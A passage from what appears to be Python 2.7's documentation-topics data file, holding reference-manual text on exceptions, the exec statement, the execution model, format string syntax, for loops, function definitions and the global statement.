value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exec': u'\nThe "exec" statement\n********************\n\n exec_stmt ::= "exec" or_expr ["in" expression ["," expression]]\n\nThis statement supports dynamic execution of Python code. The first\nexpression should evaluate to either a Unicode string, a *Latin-1*\nencoded string, an open file object, a code object, or a tuple. If it\nis a string, the string is parsed as a suite of Python statements\nwhich is then executed (unless a syntax error occurs). [1] If it is an\nopen file, the file is parsed until EOF and executed. If it is a code\nobject, it is simply executed. For the interpretation of a tuple, see\nbelow. In all cases, the code that\'s executed is expected to be valid\nas file input (see section File input). Be aware that the "return"\nand "yield" statements may not be used outside of function definitions\neven within the context of code passed to the "exec" statement.\n\nIn all cases, if the optional parts are omitted, the code is executed\nin the current scope. If only the first expression after "in" is\nspecified, it should be a dictionary, which will be used for both the\nglobal and the local variables. If two expressions are given, they\nare used for the global and local variables, respectively. If\nprovided, *locals* can be any mapping object. Remember that at module\nlevel, globals and locals are the same dictionary. If two separate\nobjects are given as *globals* and *locals*, the code will be executed\nas if it were embedded in a class definition.\n\nThe first expression may also be a tuple of length 2 or 3. In this\ncase, the optional parts must be omitted. The form "exec(expr,\nglobals)" is equivalent to "exec expr in globals", while the form\n"exec(expr, globals, locals)" is equivalent to "exec expr in globals,\nlocals". The tuple form of "exec" provides compatibility with Python\n3, where "exec" is a function rather than a statement.\n\nChanged in version 2.4: Formerly, *locals* was required to be a\ndictionary.\n\nAs a side effect, an implementation may insert additional keys into\nthe dictionaries given besides those corresponding to variable names\nset by the executed code. For example, the current implementation may\nadd a reference to the dictionary of the built-in module "__builtin__"\nunder the key "__builtins__" (!).\n\n**Programmer\'s hints:** dynamic evaluation of expressions is supported\nby the built-in function "eval()". The built-in functions "globals()"\nand "locals()" return the current global and local dictionary,\nrespectively, which may be useful to pass around for use by "exec".\n\n-[ Footnotes ]-\n\n[1] Note that the parser only accepts the Unix-style end of line\n convention. If you are reading the code from a file, make sure to\n use *universal newlines* mode to convert Windows or Mac-style\n newlines.\n', 'execmodel': u'\nExecution model\n***************\n\n\nNaming and binding\n==================\n\n*Names* refer to objects. Names are introduced by name binding\noperations. Each occurrence of a name in the program text refers to\nthe *binding* of that name established in the innermost function block\ncontaining the use.\n\nA *block* is a piece of Python program text that is executed as a\nunit. The following are blocks: a module, a function body, and a class\ndefinition. Each command typed interactively is a block. A script\nfile (a file given as standard input to the interpreter or specified\non the interpreter command line the first argument) is a code block.\nA script command (a command specified on the interpreter command line\nwith the \'**-c**\' option) is a code block. The file read by the\nbuilt-in function "execfile()" is a code block. The string argument\npassed to the built-in function "eval()" and to the "exec" statement\nis a code block. The expression read and evaluated by the built-in\nfunction "input()" is a code block.\n\nA code block is executed in an *execution frame*. A frame contains\nsome administrative information (used for debugging) and determines\nwhere and how execution continues after the code block\'s execution has\ncompleted.\n\nA *scope* defines the visibility of a name within a block. If a local\nvariable is defined in a block, its scope includes that block. If the\ndefinition occurs in a function block, the scope extends to any blocks\ncontained within the defining one, unless a contained block introduces\na different binding for the name. The scope of names defined in a\nclass block is limited to the class block; it does not extend to the\ncode blocks of methods -- this includes generator expressions since\nthey are implemented using a function scope. This means that the\nfollowing will fail:\n\n class A:\n a = 42\n b = list(a + i for i in range(10))\n\nWhen a name is used in a code block, it is resolved using the nearest\nenclosing scope. The set of all such scopes visible to a code block\nis called the block\'s *environment*.\n\nIf a name is bound in a block, it is a local variable of that block.\nIf a name is bound at the module level, it is a global variable. (The\nvariables of the module code block are local and global.) If a\nvariable is used in a code block but not defined there, it is a *free\nvariable*.\n\nWhen a name is not found at all, a "NameError" exception is raised.\nIf the name refers to a local variable that has not been bound, a\n"UnboundLocalError" exception is raised. "UnboundLocalError" is a\nsubclass of "NameError".\n\nThe following constructs bind names: formal parameters to functions,\n"import" statements, class and function definitions (these bind the\nclass or function name in the defining block), and targets that are\nidentifiers if occurring in an assignment, "for" loop header, in the\nsecond position of an "except" clause header or after "as" in a "with"\nstatement. The "import" statement of the form "from ... import *"\nbinds all names defined in the imported module, except those beginning\nwith an underscore. This form may only be used at the module level.\n\nA target occurring in a "del" statement is also considered bound for\nthis purpose (though the actual semantics are to unbind the name). It\nis illegal to unbind a name that is referenced by an enclosing scope;\nthe compiler will report a "SyntaxError".\n\nEach assignment or import statement occurs within a block defined by a\nclass or function definition or at the module level (the top-level\ncode block).\n\nIf a name binding operation occurs anywhere within a code block, all\nuses of the name within the block are treated as references to the\ncurrent block. This can lead to errors when a name is used within a\nblock before it is bound. This rule is subtle. Python lacks\ndeclarations and allows name binding operations to occur anywhere\nwithin a code block. The local variables of a code block can be\ndetermined by scanning the entire text of the block for name binding\noperations.\n\nIf the global statement occurs within a block, all uses of the name\nspecified in the statement refer to the binding of that name in the\ntop-level namespace. Names are resolved in the top-level namespace by\nsearching the global namespace, i.e. the namespace of the module\ncontaining the code block, and the builtins namespace, the namespace\nof the module "__builtin__". The global namespace is searched first.\nIf the name is not found there, the builtins namespace is searched.\nThe global statement must precede all uses of the name.\n\nThe builtins namespace associated with the execution of a code block\nis actually found by looking up the name "__builtins__" in its global\nnamespace; this should be a dictionary or a module (in the latter case\nthe module\'s dictionary is used). By default, when in the "__main__"\nmodule, "__builtins__" is the built-in module "__builtin__" (note: no\n\'s\'); when in any other module, "__builtins__" is an alias for the\ndictionary of the "__builtin__" module itself. "__builtins__" can be\nset to a user-created dictionary to create a weak form of restricted\nexecution.\n\n**CPython implementation detail:** Users should not touch\n"__builtins__"; it is strictly an implementation detail. Users\nwanting to override values in the builtins namespace should "import"\nthe "__builtin__" (no \'s\') module and modify its attributes\nappropriately.\n\nThe namespace for a module is automatically created the first time a\nmodule is imported. The main module for a script is always called\n"__main__".\n\nThe "global" statement has the same scope as a name binding operation\nin the same block. If the nearest enclosing scope for a free variable\ncontains a global statement, the free variable is treated as a global.\n\nA class definition is an executable statement that may use and define\nnames. These references follow the normal rules for name resolution.\nThe namespace of the class definition becomes the attribute dictionary\nof the class. Names defined at the class scope are not visible in\nmethods.\n\n\nInteraction with dynamic features\n---------------------------------\n\nThere are several cases where Python statements are illegal when used\nin conjunction with nested scopes that contain free variables.\n\nIf a variable is referenced in an enclosing scope, it is illegal to\ndelete the name. An error will be reported at compile time.\n\nIf the wild card form of import --- "import *" --- is used in a\nfunction and the function contains or is a nested block with free\nvariables, the compiler will raise a "SyntaxError".\n\nIf "exec" is used in a function and the function contains or is a\nnested block with free variables, the compiler will raise a\n"SyntaxError" unless the exec explicitly specifies the local namespace\nfor the "exec". (In other words, "exec obj" would be illegal, but\n"exec obj in ns" would be legal.)\n\nThe "eval()", "execfile()", and "input()" functions and the "exec"\nstatement do not have access to the full environment for resolving\nnames. Names may be resolved in the local and global namespaces of\nthe caller. Free variables are not resolved in the nearest enclosing\nnamespace, but in the global namespace. [1] The "exec" statement and\nthe "eval()" and "execfile()" functions have optional arguments to\noverride the global and local namespace. If only one namespace is\nspecified, it is used for both.\n\n\nExceptions\n==========\n\nExceptions are a means of breaking out of the normal flow of control\nof a code block in order to handle errors or other exceptional\nconditions. An exception is *raised* at the point where the error is\ndetected; it may be *handled* by the surrounding code block or by any\ncode block that directly or indirectly invoked the code block where\nthe error occurred.\n\nThe Python interpreter raises an exception when it detects a run-time\nerror (such as division by zero). A Python program can also\nexplicitly raise an exception with the "raise" statement. Exception\nhandlers are specified with the "try" ... "except" statement. The\n"finally" clause of such a statement can be used to specify cleanup\ncode which does not handle the exception, but is executed whether an\nexception occurred or not in the preceding code.\n\nPython uses the "termination" model of error handling: an exception\nhandler can find out what happened and continue execution at an outer\nlevel, but it cannot repair the cause of the error and retry the\nfailing operation (except by re-entering the offending piece of code\nfrom the top).\n\nWhen an exception is not handled at all, the interpreter terminates\nexecution of the program, or returns to its interactive main loop. In\neither case, it prints a stack backtrace, except when the exception is\n"SystemExit".\n\nExceptions are identified by class instances. The "except" clause is\nselected depending on the class of the instance: it must reference the\nclass of the instance or a base class thereof. The instance can be\nreceived by the handler and can carry additional information about the\nexceptional condition.\n\nExceptions can also be identified by strings, in which case the\n"except" clause is selected by object identity. An arbitrary value\ncan be raised along with the identifying string which can be passed to\nthe handler.\n\nNote: Messages to exceptions are not part of the Python API. Their\n contents may change from one version of Python to the next without\n warning and should not be relied on by code which will run under\n multiple versions of the interpreter.\n\nSee also the description of the "try" statement in section The try\nstatement and "raise" statement in section The raise statement.\n\n-[ Footnotes ]-\n\n[1] This limitation occurs because the code that is executed by\n these operations is not available at the time the module is\n compiled.\n', 'exprlists': u'\nExpression lists\n****************\n\n expression_list ::= expression ( "," expression )* [","]\n\nAn expression list containing at least one comma yields a tuple. The\nlength of the tuple is the number of expressions in the list. The\nexpressions are evaluated from left to right.\n\nThe trailing comma is required only to create a single tuple (a.k.a. a\n*singleton*); it is optional in all other cases. A single expression\nwithout a trailing comma doesn\'t create a tuple, but rather yields the\nvalue of that expression. (To create an empty tuple, use an empty pair\nof parentheses: "()".)\n', 'floating': u'\nFloating point literals\n***********************\n\nFloating point literals are described by the following lexical\ndefinitions:\n\n floatnumber ::= pointfloat | exponentfloat\n pointfloat ::= [intpart] fraction | intpart "."\n exponentfloat ::= (intpart | pointfloat) exponent\n intpart ::= digit+\n fraction ::= "." digit+\n exponent ::= ("e" | "E") ["+" | "-"] digit+\n\nNote that the integer and exponent parts of floating point numbers can\nlook like octal integers, but are interpreted using radix 10. For\nexample, "077e010" is legal, and denotes the same number as "77e10".\nThe allowed range of floating point literals is implementation-\ndependent. Some examples of floating point literals:\n\n 3.14 10. .001 1e100 3.14e-10 0e0\n\nNote that numeric literals do not include a sign; a phrase like "-1"\nis actually an expression composed of the unary operator "-" and the\nliteral "1".\n', 'for': u'\nThe "for" statement\n*******************\n\nThe "for" statement is used to iterate over the elements of a sequence\n(such as a string, tuple or list) or other iterable object:\n\n for_stmt ::= "for" target_list "in" expression_list ":" suite\n ["else" ":" suite]\n\nThe expression list is evaluated once; it should yield an iterable\nobject. An iterator is created for the result of the\n"expression_list". The suite is then executed once for each item\nprovided by the iterator, in the order of ascending indices. Each\nitem in turn is assigned to the target list using the standard rules\nfor assignments, and then the suite is executed. When the items are\nexhausted (which is immediately when the sequence is empty), the suite\nin the "else" clause, if present, is executed, and the loop\nterminates.\n\nA "break" statement executed in the first suite terminates the loop\nwithout executing the "else" clause\'s suite. A "continue" statement\nexecuted in the first suite skips the rest of the suite and continues\nwith the next item, or with the "else" clause if there was no next\nitem.\n\nThe suite may assign to the variable(s) in the target list; this does\nnot affect the next item assigned to it.\n\nThe target list is not deleted when the loop is finished, but if the\nsequence is empty, it will not have been assigned to at all by the\nloop. Hint: the built-in function "range()" returns a sequence of\nintegers suitable to emulate the effect of Pascal\'s "for i := a to b\ndo"; e.g., "range(3)" returns the list "[0, 1, 2]".\n\nNote: There is a subtlety when the sequence is being modified by the\n loop (this can only occur for mutable sequences, i.e. lists). An\n internal counter is used to keep track of which item is used next,\n and this is incremented on each iteration. When this counter has\n reached the length of the sequence the loop terminates. This means\n that if the suite deletes the current (or a previous) item from the\n sequence, the next item will be skipped (since it gets the index of\n the current item which has already been treated). Likewise, if the\n suite inserts an item in the sequence before the current item, the\n current item will be treated again the next time through the loop.\n This can lead to nasty bugs that can be avoided by making a\n temporary copy using a slice of the whole sequence, e.g.,\n\n for x in a[:]:\n if x < 0: a.remove(x)\n', 'formatstrings': u'\nFormat String Syntax\n********************\n\nThe "str.format()" method and the "Formatter" class share the same\nsyntax for format strings (although in the case of "Formatter",\nsubclasses can define their own format string syntax).\n\nFormat strings contain "replacement fields" surrounded by curly braces\n"{}". Anything that is not contained in braces is considered literal\ntext, which is copied unchanged to the output. If you need to include\na brace character in the literal text, it can be escaped by doubling:\n"{{" and "}}".\n\nThe grammar for a replacement field is as follows:\n\n replacement_field ::= "{" [field_name] ["!" conversion] [":" format_spec] "}"\n field_name ::= arg_name ("." attribute_name | "[" element_index "]")*\n arg_name ::= [identifier | integer]\n attribute_name ::= identifier\n element_index ::= integer | index_string\n index_string ::= <any source character except "]"> +\n conversion ::= "r" | "s"\n format_spec ::= <described in the next section>\n\nIn less formal terms, the replacement field can start with a\n*field_name* that specifies the object whose value is to be formatted\nand inserted into the output instead of the replacement field. The\n*field_name* is optionally followed by a *conversion* field, which is\npreceded by an exclamation point "\'!\'", and a *format_spec*, which is\npreceded by a colon "\':\'". These specify a non-default format for the\nreplacement value.\n\nSee also the Format Specification Mini-Language section.\n\nThe *field_name* itself begins with an *arg_name* that is either a\nnumber or a keyword. If it\'s a number, it refers to a positional\nargument, and if it\'s a keyword, it refers to a named keyword\nargument. If the numerical arg_names in a format string are 0, 1, 2,\n... in sequence, they can all be omitted (not just some) and the\nnumbers 0, 1, 2, ... will be automatically inserted in that order.\nBecause *arg_name* is not quote-delimited, it is not possible to\nspecify arbitrary dictionary keys (e.g., the strings "\'10\'" or\n"\':-]\'") within a format string. The *arg_name* can be followed by any\nnumber of index or attribute expressions. An expression of the form\n"\'.name\'" selects the named attribute using "getattr()", while an\nexpression of the form "\'[index]\'" does an index lookup using\n"__getitem__()".\n\nChanged in version 2.7: The positional argument specifiers can be\nomitted, so "\'{} {}\'" is equivalent to "\'{0} {1}\'".\n\nSome simple format string examples:\n\n "First, thou shalt count to {0}" # References first positional argument\n "Bring me a {}" # Implicitly references the first positional argument\n "From {} to {}" # Same as "From {0} to {1}"\n "My quest is {name}" # References keyword argument \'name\'\n "Weight in tons {0.weight}" # \'weight\' attribute of first positional arg\n "Units destroyed: {players[0]}" # First element of keyword argument \'players\'.\n\nThe *conversion* field causes a type coercion before formatting.\nNormally, the job of formatting a value is done by the "__format__()"\nmethod of the value itself. However, in some cases it is desirable to\nforce a type to be formatted as a string, overriding its own\ndefinition of formatting. By converting the value to a string before\ncalling "__format__()", the normal formatting logic is bypassed.\n\nTwo conversion flags are currently supported: "\'!s\'" which calls\n"str()" on the value, and "\'!r\'" which calls "repr()".\n\nSome examples:\n\n "Harold\'s a clever {0!s}" # Calls str() on the argument first\n "Bring out the holy {name!r}" # Calls repr() on the argument first\n\nThe *format_spec* field contains a specification of how the value\nshould be presented, including such details as field width, alignment,\npadding, decimal precision and so on. Each value type can define its\nown "formatting mini-language" or interpretation of the *format_spec*.\n\nMost built-in types support a common formatting mini-language, which\nis described in the next section.\n\nA *format_spec* field can also include nested replacement fields\nwithin it. These nested replacement fields can contain only a field\nname; conversion flags and format specifications are not allowed. The\nreplacement fields within the format_spec are substituted before the\n*format_spec* string is interpreted. This allows the formatting of a\nvalue to be dynamically specified.\n\nSee the Format examples section for some examples.\n\n\nFormat Specification Mini-Language\n==================================\n\n"Format specifications" are used within replacement fields contained\nwithin a format string to define how individual values are presented\n(see Format String Syntax). They can also be passed directly to the\nbuilt-in "format()" function. Each formattable type may define how\nthe format specification is to be interpreted.\n\nMost built-in types implement the following options for format\nspecifications, although some of the formatting options are only\nsupported by the numeric types.\n\nA general convention is that an empty format string ("""") produces\nthe same result as if you had called "str()" on the value. A non-empty\nformat string typically modifies the result.\n\nThe general form of a *standard format specifier* is:\n\n format_spec ::= [[fill]align][sign][#][0][width][,][.precision][type]\n fill ::= <any character>\n align ::= "<" | ">" | "=" | "^"\n sign ::= "+" | "-" | " "\n width ::= integer\n precision ::= integer\n type ::= "b" | "c" | "d" | "e" | "E" | "f" | "F" | "g" | "G" | "n" | "o" | "s" | "x" | "X" | "%"\n\nIf a valid *align* value is specified, it can be preceded by a *fill*\ncharacter that can be any character and defaults to a space if\nomitted. Note that it is not possible to use "{" and "}" as *fill*\nchar while using the "str.format()" method; this limitation however\ndoesn\'t affect the "format()" function.\n\nThe meaning of the various alignment options is as follows:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\'<\'" | Forces the field to be left-aligned within the available |\n | | space (this is the default for most objects). |\n +-----------+------------------------------------------------------------+\n | "\'>\'" | Forces the field to be right-aligned within the available |\n | | space (this is the default for numbers). |\n +-----------+------------------------------------------------------------+\n | "\'=\'" | Forces the padding to be placed after the sign (if any) |\n | | but before the digits. This is used for printing fields |\n | | in the form \'+000000120\'. This alignment option is only |\n | | valid for numeric types. |\n +-----------+------------------------------------------------------------+\n | "\'^\'" | Forces the field to be centered within the available |\n | | space. |\n +-----------+------------------------------------------------------------+\n\nNote that unless a minimum field width is defined, the field width\nwill always be the same size as the data to fill it, so that the\nalignment option has no meaning in this case.\n\nThe *sign* option is only valid for number types, and can be one of\nthe following:\n\n +-----------+------------------------------------------------------------+\n | Option | Meaning |\n +===========+============================================================+\n | "\'+\'" | indicates that a sign should be used for both positive as |\n | | well as negative numbers. |\n +-----------+------------------------------------------------------------+\n | "\'-\'" | indicates that a sign should be used only for negative |\n | | numbers (this is the default behavior). |\n +-----------+------------------------------------------------------------+\n | space | indicates that a leading space should be used on positive |\n | | numbers, and a minus sign on negative numbers. |\n +-----------+------------------------------------------------------------+\n\nThe "\'#\'" option is only valid for integers, and only for binary,\noctal, or hexadecimal output. If present, it specifies that the\noutput will be prefixed by "\'0b\'", "\'0o\'", or "\'0x\'", respectively.\n\nThe "\',\'" option signals the use of a comma for a thousands separator.\nFor a locale aware separator, use the "\'n\'" integer presentation type\ninstead.\n\nChanged in version 2.7: Added the "\',\'" option (see also **PEP 378**).\n\n*width* is a decimal integer defining the minimum field width. If not\nspecified, then the field width will be determined by the content.\n\nPreceding the *width* field by a zero ("\'0\'") character enables sign-\naware zero-padding for numeric types. This is equivalent to a *fill*\ncharacter of "\'0\'" with an *alignment* type of "\'=\'".\n\nThe *precision* is a decimal number indicating how many digits should\nbe displayed after the decimal point for a floating point value\nformatted with "\'f\'" and "\'F\'", or before and after the decimal point\nfor a floating point value formatted with "\'g\'" or "\'G\'". For non-\nnumber types the field indicates the maximum field size - in other\nwords, how many characters will be used from the field content. The\n*precision* is not allowed for integer values.\n\nFinally, the *type* determines how the data should be presented.\n\nThe available string presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\'s\'" | String format. This is the default type for strings and |\n | | may be omitted. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\'s\'". |\n +-----------+------------------------------------------------------------+\n\nThe available integer presentation types are:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\'b\'" | Binary format. Outputs the number in base 2. |\n +-----------+------------------------------------------------------------+\n | "\'c\'" | Character. Converts the integer to the corresponding |\n | | unicode character before printing. |\n +-----------+------------------------------------------------------------+\n | "\'d\'" | Decimal Integer. Outputs the number in base 10. |\n +-----------+------------------------------------------------------------+\n | "\'o\'" | Octal format. Outputs the number in base 8. |\n +-----------+------------------------------------------------------------+\n | "\'x\'" | Hex format. Outputs the number in base 16, using lower- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\'X\'" | Hex format. Outputs the number in base 16, using upper- |\n | | case letters for the digits above 9. |\n +-----------+------------------------------------------------------------+\n | "\'n\'" | Number. This is the same as "\'d\'", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\'d\'". |\n +-----------+------------------------------------------------------------+\n\nIn addition to the above presentation types, integers can be formatted\nwith the floating point presentation types listed below (except "\'n\'"\nand None). When doing so, "float()" is used to convert the integer to\na floating point number before formatting.\n\nThe available presentation types for floating point and decimal values\nare:\n\n +-----------+------------------------------------------------------------+\n | Type | Meaning |\n +===========+============================================================+\n | "\'e\'" | Exponent notation. Prints the number in scientific |\n | | notation using the letter \'e\' to indicate the exponent. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\'E\'" | Exponent notation. Same as "\'e\'" except it uses an upper |\n | | case \'E\' as the separator character. |\n +-----------+------------------------------------------------------------+\n | "\'f\'" | Fixed point. Displays the number as a fixed-point number. |\n | | The default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\'F\'" | Fixed point. Same as "\'f\'". |\n +-----------+------------------------------------------------------------+\n | "\'g\'" | General format. For a given precision "p >= 1", this |\n | | rounds the number to "p" significant digits and then |\n | | formats the result in either fixed-point format or in |\n | | scientific notation, depending on its magnitude. The |\n | | precise rules are as follows: suppose that the result |\n | | formatted with presentation type "\'e\'" and precision "p-1" |\n | | would have exponent "exp". Then if "-4 <= exp < p", the |\n | | number is formatted with presentation type "\'f\'" and |\n | | precision "p-1-exp". Otherwise, the number is formatted |\n | | with presentation type "\'e\'" and precision "p-1". In both |\n | | cases insignificant trailing zeros are removed from the |\n | | significand, and the decimal point is also removed if |\n | | there are no remaining digits following it. Positive and |\n | | negative infinity, positive and negative zero, and nans, |\n | | are formatted as "inf", "-inf", "0", "-0" and "nan" |\n | | respectively, regardless of the precision. A precision of |\n | | "0" is treated as equivalent to a precision of "1". The |\n | | default precision is "6". |\n +-----------+------------------------------------------------------------+\n | "\'G\'" | General format. Same as "\'g\'" except switches to "\'E\'" if |\n | | the number gets too large. The representations of infinity |\n | | and NaN are uppercased, too. |\n +-----------+------------------------------------------------------------+\n | "\'n\'" | Number. This is the same as "\'g\'", except that it uses the |\n | | current locale setting to insert the appropriate number |\n | | separator characters. |\n +-----------+------------------------------------------------------------+\n | "\'%\'" | Percentage. Multiplies the number by 100 and displays in |\n | | fixed ("\'f\'") format, followed by a percent sign. |\n +-----------+------------------------------------------------------------+\n | None | The same as "\'g\'". |\n +-----------+------------------------------------------------------------+\n\n\nFormat examples\n===============\n\nThis section contains examples of the new format syntax and comparison\nwith the old "%"-formatting.\n\nIn most of the cases the syntax is similar to the old "%"-formatting,\nwith the addition of the "{}" and with ":" used instead of "%". For\nexample, "\'%03.2f\'" can be translated to "\'{:03.2f}\'".\n\nThe new format syntax also supports new and different options, shown\nin the follow examples.\n\nAccessing arguments by position:\n\n >>> \'{0}, {1}, {2}\'.format(\'a\', \'b\', \'c\')\n \'a, b, c\'\n >>> \'{}, {}, {}\'.format(\'a\', \'b\', \'c\') # 2.7+ only\n \'a, b, c\'\n >>> \'{2}, {1}, {0}\'.format(\'a\', \'b\', \'c\')\n \'c, b, a\'\n >>> \'{2}, {1}, {0}\'.format(*\'abc\') # unpacking argument sequence\n \'c, b, a\'\n >>> \'{0}{1}{0}\'.format(\'abra\', \'cad\') # arguments\' indices can be repeated\n \'abracadabra\'\n\nAccessing arguments by name:\n\n >>> \'Coordinates: {latitude}, {longitude}\'.format(latitude=\'37.24N\', longitude=\'-115.81W\')\n \'Coordinates: 37.24N, -115.81W\'\n >>> coord = {\'latitude\': \'37.24N\', \'longitude\': \'-115.81W\'}\n >>> \'Coordinates: {latitude}, {longitude}\'.format(**coord)\n \'Coordinates: 37.24N, -115.81W\'\n\nAccessing arguments\' attributes:\n\n >>> c = 3-5j\n >>> (\'The complex number {0} is formed from the real part {0.real} \'\n ... \'and the imaginary part {0.imag}.\').format(c)\n \'The complex number (3-5j) is formed from the real part 3.0 and the imaginary part -5.0.\'\n >>> class Point(object):\n ... def __init__(self, x, y):\n ... self.x, self.y = x, y\n ... def __str__(self):\n ... return \'Point({self.x}, {self.y})\'.format(self=self)\n ...\n >>> str(Point(4, 2))\n \'Point(4, 2)\'\n\nAccessing arguments\' items:\n\n >>> coord = (3, 5)\n >>> \'X: {0[0]}; Y: {0[1]}\'.format(coord)\n \'X: 3; Y: 5\'\n\nReplacing "%s" and "%r":\n\n >>> "repr() shows quotes: {!r}; str() doesn\'t: {!s}".format(\'test1\', \'test2\')\n "repr() shows quotes: \'test1\'; str() doesn\'t: test2"\n\nAligning the text and specifying a width:\n\n >>> \'{:<30}\'.format(\'left aligned\')\n \'left aligned \'\n >>> \'{:>30}\'.format(\'right aligned\')\n \' right aligned\'\n >>> \'{:^30}\'.format(\'centered\')\n \' centered \'\n >>> \'{:*^30}\'.format(\'centered\') # use \'*\' as a fill char\n \'***********centered***********\'\n\nReplacing "%+f", "%-f", and "% f" and specifying a sign:\n\n >>> \'{:+f}; {:+f}\'.format(3.14, -3.14) # show it always\n \'+3.140000; -3.140000\'\n >>> \'{: f}; {: f}\'.format(3.14, -3.14) # show a space for positive numbers\n \' 3.140000; -3.140000\'\n >>> \'{:-f}; {:-f}\'.format(3.14, -3.14) # show only the minus -- same as \'{:f}; {:f}\'\n \'3.140000; -3.140000\'\n\nReplacing "%x" and "%o" and converting the value to different bases:\n\n >>> # format also supports binary numbers\n >>> "int: {0:d}; hex: {0:x}; oct: {0:o}; bin: {0:b}".format(42)\n \'int: 42; hex: 2a; oct: 52; bin: 101010\'\n >>> # with 0x, 0o, or 0b as prefix:\n >>> "int: {0:d}; hex: {0:#x}; oct: {0:#o}; bin: {0:#b}".format(42)\n \'int: 42; hex: 0x2a; oct: 0o52; bin: 0b101010\'\n\nUsing the comma as a thousands separator:\n\n >>> \'{:,}\'.format(1234567890)\n \'1,234,567,890\'\n\nExpressing a percentage:\n\n >>> points = 19.5\n >>> total = 22\n >>> \'Correct answers: {:.2%}\'.format(points/total)\n \'Correct answers: 88.64%\'\n\nUsing type-specific formatting:\n\n >>> import datetime\n >>> d = datetime.datetime(2010, 7, 4, 12, 15, 58)\n >>> \'{:%Y-%m-%d %H:%M:%S}\'.format(d)\n \'2010-07-04 12:15:58\'\n\nNesting arguments and more complex examples:\n\n >>> for align, text in zip(\'<^>\', [\'left\', \'center\', \'right\']):\n ... \'{0:{fill}{align}16}\'.format(text, fill=align, align=align)\n ...\n \'left<<<<<<<<<<<<\'\n \'^^^^^center^^^^^\'\n \'>>>>>>>>>>>right\'\n >>>\n >>> octets = [192, 168, 0, 1]\n >>> \'{:02X}{:02X}{:02X}{:02X}\'.format(*octets)\n \'C0A80001\'\n >>> int(_, 16)\n 3232235521\n >>>\n >>> width = 5\n >>> for num in range(5,12):\n ... for base in \'dXob\':\n ... print \'{0:{width}{base}}\'.format(num, base=base, width=width),\n ... print\n ...\n 5 5 5 101\n 6 6 6 110\n 7 7 7 111\n 8 8 10 1000\n 9 9 11 1001\n 10 A 12 1010\n 11 B 13 1011\n', 'function': u'\nFunction definitions\n********************\n\nA function definition defines a user-defined function object (see\nsection The standard type hierarchy):\n\n decorated ::= decorators (classdef | funcdef)\n decorators ::= decorator+\n decorator ::= "@" dotted_name ["(" [argument_list [","]] ")"] NEWLINE\n funcdef ::= "def" funcname "(" [parameter_list] ")" ":" suite\n dotted_name ::= identifier ("." identifier)*\n parameter_list ::= (defparameter ",")*\n ( "*" identifier ["," "**" identifier]\n | "**" identifier\n | defparameter [","] )\n defparameter ::= parameter ["=" expression]\n sublist ::= parameter ("," parameter)* [","]\n parameter ::= identifier | "(" sublist ")"\n funcname ::= identifier\n\nA function definition is an executable statement. Its execution binds\nthe function name in the current local namespace to a function object\n(a wrapper around the executable code for the function). This\nfunction object contains a reference to the current global namespace\nas the global namespace to be used when the function is called.\n\nThe function definition does not execute the function body; this gets\nexecuted only when the function is called. [3]\n\nA function definition may be wrapped by one or more *decorator*\nexpressions. Decorator expressions are evaluated when the function is\ndefined, in the scope that contains the function definition. The\nresult must be a callable, which is invoked with the function object\nas the only argument. The returned value is bound to the function name\ninstead of the function object. Multiple decorators are applied in\nnested fashion. For example, the following code:\n\n @f1(arg)\n @f2\n def func(): pass\n\nis equivalent to:\n\n def func(): pass\n func = f1(arg)(f2(func))\n\nWhen one or more top-level *parameters* have the form *parameter* "="\n*expression*, the function is said to have "default parameter values."\nFor a parameter with a default value, the corresponding *argument* may\nbe omitted from a call, in which case the parameter\'s default value is\nsubstituted. If a parameter has a default value, all following\nparameters must also have a default value --- this is a syntactic\nrestriction that is not expressed by the grammar.\n\n**Default parameter values are evaluated when the function definition\nis executed.** This means that the expression is evaluated once, when\nthe function is defined, and that the same "pre-computed" value is\nused for each call. This is especially important to understand when a\ndefault parameter is a mutable object, such as a list or a dictionary:\nif the function modifies the object (e.g. by appending an item to a\nlist), the default value is in effect modified. This is generally not\nwhat was intended. A way around this is to use "None" as the\ndefault, and explicitly test for it in the body of the function, e.g.:\n\n def whats_on_the_telly(penguin=None):\n if penguin is None:\n penguin = []\n penguin.append("property of the zoo")\n return penguin\n\nFunction call semantics are described in more detail in section Calls.\nA function call always assigns values to all parameters mentioned in\nthe parameter list, either from position arguments, from keyword\narguments, or from default values. If the form ""*identifier"" is\npresent, it is initialized to a tuple receiving any excess positional\nparameters, defaulting to the empty tuple. If the form\n""**identifier"" is present, it is initialized to a new dictionary\nreceiving any excess keyword arguments, defaulting to a new empty\ndictionary.\n\nIt is also possible to create anonymous functions (functions not bound\nto a name), for immediate use in expressions. This uses lambda\nexpressions, described in section Lambdas. Note that the lambda\nexpression is merely a shorthand for a simplified function definition;\na function defined in a ""def"" statement can be passed around or\nassigned to another name just like a function defined by a lambda\nexpression. The ""def"" form is actually more powerful since it\nallows the execution of multiple statements.\n\n**Programmer\'s note:** Functions are first-class objects. A ""def""\nform executed inside a function definition defines a local function\nthat can be returned or passed around. Free variables used in the\nnested function can access the local variables of the function\ncontaining the def. See section Naming and binding for details.\n', 'global': u'\nThe "global" statement\n**********************\n\n global_stmt ::= "global" identifier ("," identifier)*\n\nThe "global" statement is a declaration which holds for the entire\ncurrent code block. It means that the listed identifiers are to be\ninterpreted as globals. It would be impossible to assign to a global\nvariable without "global", although free variables may refer to\nglobals without being declared global.\n\nNames listed in a "global" statement must not be used in the same code\nblock textually preceding that "global" statement.\n\nNames listed in a "global" statement must not be defined as formal\nparameters or in a "for" loop control target, "class" definition,\nfunction definition, or "import" statement.\n\n**CPython implementation 